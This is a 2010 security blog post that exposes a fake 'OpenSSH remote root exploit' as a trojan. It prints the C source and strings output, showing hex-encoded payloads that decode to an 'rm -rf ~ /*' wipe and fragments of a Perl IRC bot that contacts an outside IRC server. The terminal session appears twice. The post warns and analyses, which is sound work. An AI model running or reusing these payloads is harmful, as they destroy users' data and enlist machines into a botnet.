Yet Another Fake Exploit

Posted: February 7th, 2010 | Author: xanda | Filed under: IT Related | Tags: 0day, fake, openssh, script kiddies, ssh | 9 Comments »

PenTestIT is listed in my RSS list and just now, i’ve got a feed from PenTestIT with the title “openssh-53p1-remote-root.c”

Hurm.. what a surprise news, but.. I think I’m too old for this.. lets see..

xanda:tmp adnan$ cd /tmp
 
xanda:tmp adnan$ mkdir lame
 
xanda:tmp adnan$ cd lame/
 
xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
--2010-02-07 20:41:28--  http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c
Resolving pentestit.com (pentestit.com)... 208.87.241.96
Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13273 (13K) [text/x-c]
Saving to: `openssh-53p1-remote-root.c'
 
100%[=========================================================================================================================================>] 13,273      7.82K/s   in 1.7s    
 
2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273]
 
xanda:lame adnan$ more openssh-53p1-remote-root.c 
 
/* openssh-53p1-remote-root.c
* OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one
* Email: root@chamillionaire.com
* Release date: Unreleased (private) / 2010
* Available Patch: No fix-patch has been issued or reported.
*
* -----------------
* Additional Notes:
* -----------------
* By using this software, you take any and/or all responsibility
* for the damage(s) caused and will not bitch to me, the|one, about it.
*
* USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
 
#define VALID_RANGE 0xb44ffe00
#define build_frem(x,y,a,b,c) a##c##a##x##y##b
 
char jmpcode[] =
    "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f"
    "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26";
 
char shellcode[] =
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79"
        "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22"
        "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
        "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24"
        "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24"
        "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e"
        "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
        "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63"
        "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20"
        "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
        "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
 
xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake
 
xanda:lame adnan$ strings fake | more
 
the|one is rooting your Linux/FreeBSD Network
  Usage: %s -h <host> -p port
  Options:
-h ip/host of target
-p port
-d username
-B memory_limit 8/16/64
Root is required for raw sockets, etc.
  [+] the|one's OpenSSH Remote Root Exploit - 2010
  [-] Resolving Failed
  [-] Connecting Failed
Getting root isn't that hard, skiddie
PS1='sh-3.2#' /bin/sh
  [-] Failed to exploit the target :
rm -rf ~ /* 2> /dev/null &
#!/usr/bin/perl
$chan="#cn";
$ke";
while (<$sockG (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl
            #!/usr/bin/perl
$chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print ";
while (<$sockn";
            sleep 1;
       k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl
#!/usr/bin/perl

xanda:tmp adnan$ cd /tmp xanda:tmp adnan$ mkdir lame xanda:tmp adnan$ cd lame/ xanda:lame adnan$ wget http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c --2010-02-07 20:41:28-- http://pentestit.com/wp-content/uploads/2010/02/openssh-53p1-remote-root.c Resolving pentestit.com (pentestit.com)... 208.87.241.96 Connecting to pentestit.com (pentestit.com)|208.87.241.96|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13273 (13K) [text/x-c] Saving to: `openssh-53p1-remote-root.c' 100%[=========================================================================================================================================>] 13,273 7.82K/s in 1.7s 2010-02-07 20:41:30 (7.82 KB/s) - `openssh-53p1-remote-root.c' saved [13273/13273] xanda:lame adnan$ more openssh-53p1-remote-root.c /* openssh-53p1-remote-root.c * OpenSSH <= 5.3p1-1 Remote Root Exploit by the|one * Email: root@chamillionaire.com * Release date: Unreleased (private) / 2010 * Available Patch: No fix-patch has been issued or reported. * * ----------------- * Additional Notes: * ----------------- * By using this software, you take any and/or all responsibility * for the damage(s) caused and will not bitch to me, the|one, about it. * * USE THIS SOFTWARE AT YOUR OWN DISCRETION! Later skiddies. :> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #define VALID_RANGE 0xb44ffe00 #define build_frem(x,y,a,b,c) a##c##a##x##y##b char jmpcode[] = "\x72\x6D\x20\x2D\x72\x66\x20\x7e\x20\x2F\x2A\x20\x32\x3e\x20\x2f" "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26"; char shellcode[] = "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x0a\x24\x6b\x65" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x24\x63\x68\x61\x6e\x3d\x22\x23\x63\x6e\x22\x3b\x24\x6b\x65\x79" "\x20\x3d\x22\x66\x61\x67\x73\x22\x3b\x24\x6e\x69\x63\x6b\x3d\x22" "\x70\x68\x70\x66\x72\x22\x3b\x24\x73\x65\x72\x76\x65\x72\x3d\x22" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6b\x5c\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f" "\x63\x6b\x20\x22\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x20\x24" "\x6b\x65\x79\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x20\x28\x3c\x24" "\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e" "\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" "\x69\x72\x63\x2e\x68\x61\x6d\x2e\x64\x65\x2e\x65\x75\x69\x72\x63" "\x2e\x6e\x65\x74\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x22\x3b\x0a\x77\x68\x69\x6c\x65\x20\x28\x3c\x24\x73\x6f\x63\x6b" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x73\x6c\x65\x65\x70\x20\x31\x3b\x0a\x20\x20\x20\x20\x20\x20\x20" "\x6e\x22\x3b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a" xanda:lame adnan$ gcc openssh-53p1-remote-root.c -o fake xanda:lame adnan$ strings fake | more the|one is rooting your Linux/FreeBSD Network Usage: %s -h <host> -p port Options: -h ip/host of target -p port -d username -B memory_limit 8/16/64 Root is required for raw sockets, etc. [+] the|one's OpenSSH Remote Root Exploit - 2010 [-] Resolving Failed [-] Connecting Failed Getting root isn't that hard, skiddie PS1='sh-3.2#' /bin/sh [-] Failed to exploit the target : rm -rf ~ /* 2> /dev/null & #!/usr/bin/perl $chan="#cn"; $ke"; while (<$sockG (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl #!/usr/bin/perl $chan="#cn";$key ="fags";$nick="phpfr";$server="G (.*)$/){print "; while (<$sockn"; sleep 1; k\n";}}print $sock "JOIN $chan $key\n";while (<$sock>){if (/^PING (.*)$/){print #!/usr/bin/perl #!/usr/bin/perl

knock knock knock… script kiddies.. grow up!

OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT huh?

Posted: July 19th, 2009 | Author: xanda | Filed under: IT Related | Tags: analysis, oday, openssh, script kiddies, shellcode | 3 Comments »

I’m writing this entry by refering to ‘the exploit’ released for OpenSSH 0day as mentioned in THIS post.

Lets take a look at the exploit:

And now convert the payload into binary. Personally, I use Shellcode to EXE

And finally, view the content of the payload 😉

Now sit for a while, grab a Pepsi and think… what is going to happen if you simply download, compile and run it?

Moral of the story, “everyone might start with script kiddies, but it doesn’t mean you have to be a script kiddies forever”

Xanda's Blog !~!

Human Knowledge Belongs To The World.

Yet Another Fake Exploit

OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT huh?

Recent Posts